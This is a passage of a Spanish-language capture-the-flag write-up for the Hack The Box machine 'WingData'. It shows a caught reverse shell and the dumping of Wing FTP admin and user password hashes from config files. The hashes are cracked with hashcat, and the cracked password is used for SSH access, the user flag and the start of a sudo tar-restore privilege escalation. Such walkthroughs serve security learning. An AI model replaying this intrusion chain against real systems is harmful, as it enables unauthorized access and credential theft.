<div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span><span class="lnt">6 </span><span class="lnt">7 </span><span class="lnt">8 </span><span class="lnt">9 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">❯ rlwrap nc -lvp <span class="m">1335</span> </span></span><span class="line"><span class="cl">listening on <span class="o">[</span>any<span class="o">]</span> <span class="m">1335</span> ... </span></span><span class="line"><span class="cl">connect to <span class="o">[</span>10.10.15.60<span class="o">]</span> from wingdata.htb <span class="o">[</span>10.129.2.158<span class="o">]</span> <span class="m">43638</span> </span></span><span class="line"><span class="cl">/bin/sh: 0: can<span class="err">&#39;</span>t access tty<span class="p">;</span> job control turned off </span></span><span class="line"><span class="cl">$ whoami<span class="p">;</span>id<span class="p">;</span><span class="nb">pwd</span> </span></span><span class="line"><span class="cl">wingftp </span></span><span class="line"><span class="cl"><span class="nv">uid</span><span class="o">=</span>1000<span class="o">(</span>wingftp<span class="o">)</span> <span class="nv">gid</span><span class="o">=</span>1000<span class="o">(</span>wingftp<span class="o">)</span> <span class="nv">groups</span><span class="o">=</span>1000<span class="o">(</span>wingftp<span class="o">)</span>,24<span class="o">(</span>cdrom<span class="o">)</span>,25<span class="o">(</span>floppy<span class="o">)</span>,29<span class="o">(</span>audio<span class="o">)</span>,30<span class="o">(</span>dip<span class="o">)</span>,44<span class="o">(</span>video<span class="o">)</span>,46<span class="o">(</span>plugdev<span class="o">)</span>,100<span class="o">(</span>users<span class="o">)</span>,106<span class="o">(</span>netdev<span class="o">)</span> </span></span><span class="line"><span class="cl">/opt/wftpserver </span></span><span class="line"><span class="cl">$ </span></span></code></pre></td></tr></table> </div> </div><h2 id="config-files">Config Files</h2> <p>En el archivo de configuracion del administrador encontramos el hash.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">$ ls -lah _ADMINISTRATOR </span></span><span class="line"><span class="cl">total 16K </span></span><span class="line"><span class="cl">drwxr-x--- <span class="m">2</span> wingftp wingftp 4.0K Feb <span class="m">14</span> 15:04 . </span></span><span class="line"><span class="cl">drwxr-x--- <span class="m">4</span> wingftp wingftp 4.0K Feb <span class="m">14</span> 15:04 .. </span></span><span class="line"><span class="cl">-rwxr-x--- <span class="m">1</span> wingftp wingftp <span class="m">511</span> Feb <span class="m">14</span> 15:04 admins.xml </span></span><span class="line"><span class="cl">-rwxr-x--- <span class="m">1</span> wingftp wingftp <span class="m">372</span> Nov <span class="m">2</span> 16:26 settings.xml </span></span><span class="line"><span class="cl">$ cat _ADMINISTRATOR/admins.xml </span></span><span class="line"><span class="cl">&lt;?xml <span class="nv">version</span><span class="o">=</span><span class="s2">&#34;1.0&#34;</span> ?&gt; </span></span><span class="line"><span class="cl">&lt;ADMIN_ACCOUNTS <span class="nv">Description</span><span class="o">=</span><span class="s2">&#34;Wing FTP Server Admin Accounts&#34;</span>&gt; </span></span><span class="line"><span class="cl"> &lt;ADMIN&gt; </span></span><span class="line"><span class="cl"> &lt;Admin_Name&gt;admin&lt;/Admin_Name&gt; </span></span><span class="line"><span class="cl"> &lt;Password&gt;a8339f8e4465a9c47158394d8efe7cc45a5f361ab983844c8562bef2193bafba&lt;/Password&gt; </span></span><span class="line"><span class="cl"> &lt;Type&gt;0&lt;/Type&gt; </span></span><span class="line"><span class="cl"> &lt;Readonly&gt;0&lt;/Readonly&gt; </span></span><span class="line"><span class="cl"> &lt;IsDomainAdmin&gt;0&lt;/IsDomainAdmin&gt; </span></span><span class="line"><span class="cl"> &lt;DomainList&gt;&lt;/DomainList&gt; </span></span><span class="line"><span class="cl"> &lt;MyDirectory&gt;&lt;/MyDirectory&gt; </span></span><span class="line"><span class="cl"> &lt;EnableTwoFactor&gt;0&lt;/EnableTwoFactor&gt; </span></span><span class="line"><span class="cl"> &lt;TwoFactorCode&gt;&lt;/TwoFactorCode&gt; </span></span><span class="line"><span class="cl"> &lt;/ADMIN&gt; </span></span><span class="line"><span class="cl">&lt;/ADMIN_ACCOUNTS&gt; </span></span><span class="line"><span class="cl">$ <span class="nb">pwd</span> </span></span><span class="line"><span class="cl">/opt/wftpserver/Data </span></span><span class="line"><span class="cl">$ </span></span></code></pre></td></tr></table> </div> </div><p>Tambien en los archivos para los usuarios.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">$ cat settings.xml <span class="p">|</span> grep ServerPassword </span></span><span class="line"><span class="cl"> &lt;ServerPassword&gt;2D35A8D420A697203D7C554A678F8119&lt;/ServerPassword&gt; </span></span><span class="line"><span class="cl">$ ls -lah 1/users/ </span></span><span class="line"><span class="cl">total 28K </span></span><span class="line"><span class="cl">drwxr-x--- <span class="m">2</span> wingftp wingftp 4.0K Feb <span class="m">14</span> 17:44 . </span></span><span class="line"><span class="cl">drwxr-x--- <span class="m">4</span> wingftp wingftp 4.0K Feb <span class="m">9</span> 08:19 .. </span></span><span class="line"><span class="cl">-rwxr-x--- <span class="m">1</span> wingftp wingftp 2.8K Feb <span class="m">14</span> 17:44 anonymous.xml </span></span><span class="line"><span class="cl">-rwxr-x--- <span class="m">1</span> wingftp wingftp 2.8K Nov <span class="m">2</span> 11:13 john.xml </span></span><span class="line"><span class="cl">-rw-rw-rw- <span class="m">1</span> wingftp wingftp 2.8K Nov <span class="m">2</span> 12:05 maria.xml </span></span><span class="line"><span class="cl">-rw-rw-rw- <span class="m">1</span> wingftp wingftp 2.8K Nov <span class="m">2</span> 12:02 steve.xml </span></span><span class="line"><span class="cl">-rw-rw-rw- <span class="m">1</span> wingftp wingftp 2.8K Nov <span class="m">2</span> 12:28 wacky.xml </span></span><span class="line"><span class="cl">$ cat 1/users/*.xml <span class="p">|</span> grep <span class="s1">&#39;&lt;Password&gt;&#39;</span> <span class="p">|</span> cut -d <span class="s1">&#39;&gt;&#39;</span> -f2 <span class="p">|</span> cut -d <span class="s1">&#39;&lt;&#39;</span> -f1 </span></span><span class="line"><span class="cl">d67f86152e5c4df1b0ac4a18d3ca4a89c1b12e6b748ed71d01aeb92341927bca </span></span><span class="line"><span class="cl">c1f14672feec3bba27231048271fcdcddeb9d75ef79f6889139aa78c9d398f10 </span></span><span class="line"><span class="cl">a70221f33a51dca76dfd46c17ab17116a97823caf40aeecfbc611cae47421b03 </span></span><span class="line"><span class="cl">5916c7481fa2f20bd86f4bdb900f0342359ec19a77b7e3ae118f3b5d0d3334ca </span></span><span class="line"><span class="cl">32940defd3c3ef70a2dd44a5301ff984c4742f0baae76ff5b8783994f8a503ca </span></span><span class="line"><span class="cl">$ </span></span></code></pre></td></tr></table> </div> </div><p>En configuraciones (<code>settings.xml</code>) para usuarios, encontramos informacion para MySQL, LDAP y, el salt para los hashes de contrasena.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span><span class="lnt">33 </span><span class="lnt">34 </span><span class="lnt">35 </span><span class="lnt">36 </span><span class="lnt">37 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">$ ls </span></span><span class="line"><span class="cl">groups </span></span><span class="line"><span class="cl">portlistener.xml </span></span><span class="line"><span class="cl">settings.xml </span></span><span class="line"><span class="cl">users </span></span><span class="line"><span class="cl">$ cat settings.xml </span></span><span class="line"><span class="cl">&lt;?xml <span class="nv">version</span><span class="o">=</span><span class="s2">&#34;1.0&#34;</span> ?&gt; </span></span><span class="line"><span class="cl">&lt;DOMAIN_OPTION <span class="nv">Description</span><span class="o">=</span><span class="s2">&#34;Wing FTP Server Domain settings&#34;</span>&gt; </span></span><span class="line"><span class="cl"> <span class="c1"># [... cut ...]</span> </span></span><span class="line"><span class="cl"> &lt;MYSQL_Address&gt;localhost&lt;/MYSQL_Address&gt; </span></span><span class="line"><span class="cl"> &lt;MYSQL_Port&gt;3306&lt;/MYSQL_Port&gt; </span></span><span class="line"><span class="cl"> &lt;MYSQL_Username&gt;root&lt;/MYSQL_Username&gt; </span></span><span class="line"><span class="cl"> &lt;MYSQL_Password&gt;&lt;/MYSQL_Password&gt; </span></span><span class="line"><span class="cl"> &lt;MYSQL_DatabaseName&gt;wftp_database&lt;/MYSQL_DatabaseName&gt; </span></span><span class="line"><span class="cl"> <span class="c1"># [... cut ...]</span> </span></span><span class="line"><span class="cl"> &lt;ADUser_User_Mapping&gt;ADUser001:LocalUser001<span class="p">&amp;</span><span class="c1">#x0A;ADUser002:LocalUser002&lt;/ADUser_User_Mapping&gt;</span> </span></span><span class="line"><span class="cl"> &lt;LDAP_Enable&gt;0&lt;/LDAP_Enable&gt; </span></span><span class="line"><span class="cl"> &lt;LDAP_Host&gt;localhost&lt;/LDAP_Host&gt; </span></span><span class="line"><span class="cl"> &lt;LDAP_Port&gt;389&lt;/LDAP_Port&gt; </span></span><span class="line"><span class="cl"> &lt;LDAP_UseSSL&gt;0&lt;/LDAP_UseSSL&gt; </span></span><span class="line"><span class="cl"> &lt;LDAP_BindDN&gt;&lt;/LDAP_BindDN&gt; </span></span><span class="line"><span class="cl"> &lt;LDAP_BindPass&gt;&lt;/LDAP_BindPass&gt; </span></span><span class="line"><span class="cl"> &lt;LDAP_BaseDN&gt;&lt;/LDAP_BaseDN&gt; </span></span><span class="line"><span class="cl"> &lt;LDAP_Filter&gt;<span class="o">(</span><span class="p">&amp;</span>amp<span class="p">;</span><span class="o">(</span><span class="nv">objectClass</span><span class="o">=</span>posixAccount<span class="o">)(</span><span class="nv">uid</span><span class="o">=</span>%s<span class="o">))</span>&lt;/LDAP_Filter&gt; </span></span><span class="line"><span class="cl"> <span class="c1"># [... cut ...]</span> </span></span><span class="line"><span class="cl"> &lt;LDAP_User_Mapping&gt;LDAPUser001:LocalUser001<span class="p">&amp;</span><span class="c1">#x0A;LDAPUser002:LocalUser002&lt;/LDAP_User_Mapping&gt;</span> </span></span><span class="line"><span class="cl"> &lt;LDAP_Group_Mapping&gt;CN<span class="o">=</span>ADGroup1,CN<span class="o">=</span>Builtin,DC<span class="o">=</span>wftpserver,DC<span class="o">=</span>com:LocalUser1<span class="p">&amp;</span><span class="c1">#x0A;CN=ADGroup2,CN=Builtin,DC=wftpserver,DC=com:LocalUser2&lt;/LDAP_Group_Mapping&gt;</span> </span></span><span class="line"><span class="cl"> &lt;LDAP_Version&gt;3&lt;/LDAP_Version&gt; </span></span><span class="line"><span class="cl"> <span class="c1"># [... cut ...]&gt;</span> </span></span><span class="line"><span class="cl"> &lt;EnableSHA256&gt;1&lt;/EnableSHA256&gt; </span></span><span class="line"><span class="cl"> <span class="c1"># [... cut ...]</span> </span></span><span class="line"><span class="cl"> &lt;TLS_Session_Timeout&gt;3600&lt;/TLS_Session_Timeout&gt; </span></span><span class="line"><span class="cl"> &lt;EnablePasswordSalting&gt;1&lt;/EnablePasswordSalting&gt; </span></span><span class="line"><span class="cl"> &lt;SaltingString&gt;WingFTP&lt;/SaltingString&gt; </span></span><span class="line"><span class="cl"> <span class="c1"># [... cut ...]</span> </span></span><span class="line"><span class="cl">&lt;/DOMAIN_OPTION&gt; </span></span><span class="line"><span class="cl">$ </span></span></code></pre></td></tr></table> </div> </div><p>Agregamos el salt a los hashes encontrados.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span><span class="lnt">6 </span><span class="lnt">7 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">$ <span class="k">for</span> h in <span class="k">$(</span>cat 1/users/*.xml <span class="p">|</span> grep <span class="s1">&#39;&lt;Password&gt;&#39;</span> <span class="p">|</span> cut -d <span class="s1">&#39;&gt;&#39;</span> -f2 <span class="p">|</span> cut -d <span class="s1">&#39;&lt;&#39;</span> -f1<span class="k">)</span><span class="p">;</span> <span class="k">do</span> <span class="nb">echo</span> <span class="s2">&#34;</span><span class="nv">$h</span><span class="s2">:WingFTP&#34;</span><span class="p">;</span> <span class="k">done</span><span class="p">;</span> </span></span><span class="line"><span class="cl">d67f86152e5c4df1b0ac4a18d3ca4a89c1b12e6b748ed71d01aeb92341927bca:WingFTP </span></span><span class="line"><span class="cl">c1f14672feec3bba27231048271fcdcddeb9d75ef79f6889139aa78c9d398f10:WingFTP </span></span><span class="line"><span class="cl">a70221f33a51dca76dfd46c17ab17116a97823caf40aeecfbc611cae47421b03:WingFTP </span></span><span class="line"><span class="cl">5916c7481fa2f20bd86f4bdb900f0342359ec19a77b7e3ae118f3b5d0d3334ca:WingFTP </span></span><span class="line"><span class="cl">32940defd3c3ef70a2dd44a5301ff984c4742f0baae76ff5b8783994f8a503ca:WingFTP </span></span><span class="line"><span class="cl">$ </span></span></code></pre></td></tr></table> </div> </div><h2 id="crack-the-hash">Crack The Hash</h2> <p>Ejecutamos <code>hashcat</code> en modo <code>1410</code> para <code>sha256($hash.$salt)</code>, este encontro el valor para dos, uno vacio y el otro pertenece a wacky.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span><span class="lnt">33 </span><span class="lnt">34 </span><span class="lnt">35 </span><span class="lnt">36 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">PS C:<span class="se">\U</span>sers<span class="se">\x\D</span>ocuments<span class="se">\g</span>ithub<span class="se">\h</span>ashcat-7.1.2&gt; ./hashcat.exe -m <span class="m">1410</span> ./wftp_hashes.txt ./rockyou.txt </span></span><span class="line"><span class="cl">hashcat <span class="o">(</span>v7.1.2<span class="o">)</span> starting </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="c1"># [... cut ...]</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Dictionary cache hit: </span></span><span class="line"><span class="cl">* Filename..: ./rockyou.txt </span></span><span class="line"><span class="cl">* Passwords.: <span class="m">14344385</span> </span></span><span class="line"><span class="cl">* Bytes.....: <span class="m">139921507</span> </span></span><span class="line"><span class="cl">* Keyspace..: <span class="m">14344385</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">d67f86152e5c4df1b0ac4a18d3ca4a89c1b12e6b748ed71d01aeb92341927bca:WingFTP: </span></span><span class="line"><span class="cl">Approaching final keyspace - workload adjusted. </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">32940defd3c3ef70a2dd44a5301ff984c4742f0baae76ff5b8783994f8a503ca:WingFTP:!#7Blushing^*Bride5 </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Session..........: hashcat </span></span><span class="line"><span class="cl">Status...........: Exhausted </span></span><span class="line"><span class="cl">Hash.Mode........: <span class="m">1410</span> <span class="o">(</span>sha256<span class="o">(</span><span class="nv">$pass</span>.<span class="nv">$salt</span><span class="o">))</span> </span></span><span class="line"><span class="cl">Hash.Target......: ./wftp_hashes.txt </span></span><span class="line"><span class="cl">Time.Started.....: Sat Feb <span class="m">14</span> 17:10:49 <span class="m">2026</span> <span class="o">(</span><span class="m">1</span> sec<span class="o">)</span> </span></span><span class="line"><span class="cl">Time.Estimated...: Sat Feb <span class="m">14</span> 17:10:50 <span class="m">2026</span> <span class="o">(</span><span class="m">0</span> secs<span class="o">)</span> </span></span><span class="line"><span class="cl">Kernel.Feature...: Pure Kernel <span class="o">(</span>password length 0-256 bytes<span class="o">)</span> </span></span><span class="line"><span class="cl">Guess.Base.......: File <span class="o">(</span>./rockyou.txt<span class="o">)</span> </span></span><span class="line"><span class="cl">Guess.Queue......: 1/1 <span class="o">(</span>100.00%<span class="o">)</span> </span></span><span class="line"><span class="cl">Speed.#01........: 26899.6 kH/s <span class="o">(</span>1.81ms<span class="o">)</span> @ Accel:1024 Loops:1 Thr:64 Vec:1 </span></span><span class="line"><span class="cl">Recovered........: 2/5 <span class="o">(</span>40.00%<span class="o">)</span> Digests <span class="o">(</span>total<span class="o">)</span>, 2/5 <span class="o">(</span>40.00%<span class="o">)</span> Digests <span class="o">(</span>new<span class="o">)</span> </span></span><span class="line"><span class="cl">Progress.........: 14344385/14344385 <span class="o">(</span>100.00%<span class="o">)</span> </span></span><span class="line"><span class="cl">Rejected.........: 0/14344385 <span class="o">(</span>0.00%<span class="o">)</span> </span></span><span class="line"><span class="cl">Restore.Point....: 14344385/14344385 <span class="o">(</span>100.00%<span class="o">)</span> </span></span><span class="line"><span class="cl">Restore.Sub.#01..: Salt:0 Amplifier:0-1 Iteration:0-1 </span></span><span class="line"><span class="cl">Candidate.Engine.: Device Generator </span></span><span class="line"><span class="cl">Candidates.#01...: 0213JR -&gt; <span class="nv">$HEX</span><span class="o">[</span>042a0337c2a156616d6f732103<span class="o">]</span> </span></span><span class="line"><span class="cl">Hardware.Mon.#01.: Temp: 36c Fan: 0% Util: 35% Core:2505MHz Mem:8251MHz Bus:8 </span></span><span class="line"><span class="cl"><span class="c1"># [... cut ...]</span> </span></span><span class="line"><span class="cl">PS C:<span class="se">\U</span>sers<span class="se">\x\D</span>ocuments<span class="se">\g</span>ithub<span class="se">\h</span>ashcat-7.1.2&gt; </span></span></code></pre></td></tr></table> </div> </div><p>Observamos que las credenciales son aceptadas por SSH.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">❯ netexec ssh wingdata.htb -u <span class="s1">&#39;wacky&#39;</span> -p <span class="s1">&#39;!#7Blushing^*Bride5&#39;</span> </span></span><span class="line"><span class="cl">SSH 10.129.2.158 <span class="m">22</span> wingdata.htb <span class="o">[</span>*<span class="o">]</span> SSH-2.0-OpenSSH_9.2p1 Debian-2+deb12u7 </span></span><span class="line"><span class="cl">SSH 10.129.2.158 <span class="m">22</span> wingdata.htb <span class="o">[</span>+<span class="o">]</span> wacky:!#7Blushing^*Bride5 <span class="o">(</span>Pwn3d!<span class="o">)</span> Linux - Shell access! </span></span><span class="line"><span class="cl">❯ </span></span></code></pre></td></tr></table> </div> </div><h1 id="user---wacky">User - Wacky</h1> <p>Con este par logramos el acceso por ssh y a la flag <code>user.txt</code>.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">❯ ssh wacky@wingdata.htb </span></span><span class="line"><span class="cl">The authenticity of host <span class="s1">&#39;wingdata.htb (10.129.2.158)&#39;</span> can<span class="s1">&#39;t be established. </span></span></span><span class="line"><span class="cl"><span class="s1">ED25519 key fingerprint is: SHA256:JacnW6dsEmtRtwu2ULpY/CK8n/8M9tU+6pQhjBG3a4w </span></span></span><span class="line"><span class="cl"><span class="s1">This key is not known by any other names. </span></span></span><span class="line"><span class="cl"><span class="s1">Are you sure you want to continue connecting (yes/no/[fingerprint])? yes </span></span></span><span class="line"><span class="cl"><span class="s1">Warning: Permanently added &#39;</span>wingdata.htb<span class="s1">&#39; (ED25519) to the list of known hosts. </span></span></span><span class="line"><span class="cl"><span class="s1">wacky@wingdata.htb&#39;</span>s password: </span></span><span class="line"><span class="cl">Linux wingdata 6.1.0-42-amd64 <span class="c1">#1 SMP PREEMPT_DYNAMIC Debian 6.1.159-1 (2025-12-30) x86_64</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">The programs included with the Debian GNU/Linux system are free software<span class="p">;</span> </span></span><span class="line"><span class="cl">the exact distribution terms <span class="k">for</span> each program are described in the </span></span><span class="line"><span class="cl">individual files in /usr/share/doc/*/copyright. </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent </span></span><span class="line"><span class="cl">permitted by applicable law. </span></span><span class="line"><span class="cl">Last login: Sat Feb <span class="m">14</span> 18:12:07 <span class="m">2026</span> from 10.10.15.60 </span></span><span class="line"><span class="cl">wacky@wingdata:~$ whoami<span class="p">;</span>id<span class="p">;</span><span class="nb">pwd</span> </span></span><span class="line"><span class="cl">wacky </span></span><span class="line"><span class="cl"><span class="nv">uid</span><span class="o">=</span>1001<span class="o">(</span>wacky<span class="o">)</span> <span class="nv">gid</span><span class="o">=</span>1001<span class="o">(</span>wacky<span class="o">)</span> <span class="nv">groups</span><span class="o">=</span>1001<span class="o">(</span>wacky<span class="o">)</span> </span></span><span class="line"><span class="cl">/home/wacky </span></span><span class="line"><span class="cl">wacky@wingdata:~$ ls </span></span><span class="line"><span class="cl">user.txt </span></span><span class="line"><span class="cl">wacky@wingdata:~$ cat user.txt </span></span><span class="line"><span class="cl">e41f72e15d68fca0f208d787d361e18d </span></span><span class="line"><span class="cl">wacky@wingdata:~$ </span></span></code></pre></td></tr></table> </div> </div><h1 id="privesc">Privesc</h1> <p>Wacky puede ejecutar como root el script <code>restore_backup_clients.py</code>.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">wacky@wingdata:~$ sudo -l -l </span></span><span class="line"><span class="cl">Matching Defaults entries <span class="k">for</span> wacky on wingdata: </span></span><span class="line"><span class="cl"> env_reset, mail_badpass, <span class="nv">secure_path</span><span class="o">=</span>/usr/local/sbin<span class="se">\:</span>/usr/local/bin<span class="se">\:</span>/usr/sbin<span class="se">\:</span>/usr/bin<span class="se">\:</span>/sbin<span class="se">\:</span>/bin, use_pty </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">User wacky may run the following commands on wingdata: </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Sudoers entry: </span></span><span class="line"><span class="cl"> RunAsUsers: root </span></span><span class="line"><span class="cl"> Options: !authenticate </span></span><span class="line"><span class="cl"> Commands: </span></span><span class="line"><span class="cl"> /usr/local/bin/python3 /opt/backup_clients/restore_backup_clients.py * </span></span><span class="line"><span class="cl">wacky@wingdata:~$ file /opt/backup_clients/restore_backup_clients.py </span></span><span class="line"><span class="cl">/opt/backup_clients/restore_backup_clients.py: Python script, Unicode text, UTF-8 text executable </span></span><span class="line"><span class="cl">wacky@wingdata:~$ </span></span></code></pre></td></tr></table> </div> </div><p>Este permite restaurar archivos dentro de un archivo tar a un directorio objetivo.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">wacky@wingdata:~$ python3 /opt/backup_clients/restore_backup_clients.py -h </span></span><span class="line"><span class="cl">usage: restore_backup_clients.py <span class="o">[</span>-h<span class="o">]</span> -b BACKUP -r RESTORE_DIR </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Restore client configuration from a validated backup tarball. </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">options: </span></span><span class="line"><span class="cl"> -h, --help show this <span class="nb">help</span> message and <span class="nb">exit</span> </span></span><span class="line"><span class="cl"> -b BACKUP, --backup BACKUP </span></span><span class="line"><span class="cl"> Backup filename <span class="o">(</span>must be in /home/wacky/backup_clients/ and match backup_&lt;client_id&gt;.tar, where &lt;client_id&gt; is a positive integer, e.g., backup_1001.tar<span class="o">)</span> </span></span><span class="line"><span class="cl"> -r RESTORE_DIR, --restore-dir RESTORE_DIR </span></span><span class="line"><span class="cl"> Staging directory name <span class="k">for</span> the restore operation. Must follow the format: restore_&lt;client_user&gt; <span class="o">(</span>e.g., restore_john<span class="o">)</span>. Only alphanumeric characters and </span></span><span class="line"><span class="cl"> underscores are allowed in the &lt;client_user&gt; part <span class="o">(</span>1–24 characters<span class="o">)</span>. </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Example: sudo restore_backup_clients.py -b backup_1001.tar -r restore_john </span></span><span class="line"><span class="cl">wacky@wingdata:~$ </span></span></code></pre></td></tr></table> </div> </div><p>El script utiliza la libreria <code>tarfile</code>, se espera un archivo backup <code>backup_1001.tar</code>, el archivo se restaura en <code>/opt/backup_clients/restored_backups/&lt;restore_dir_arg&gt;</code>.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 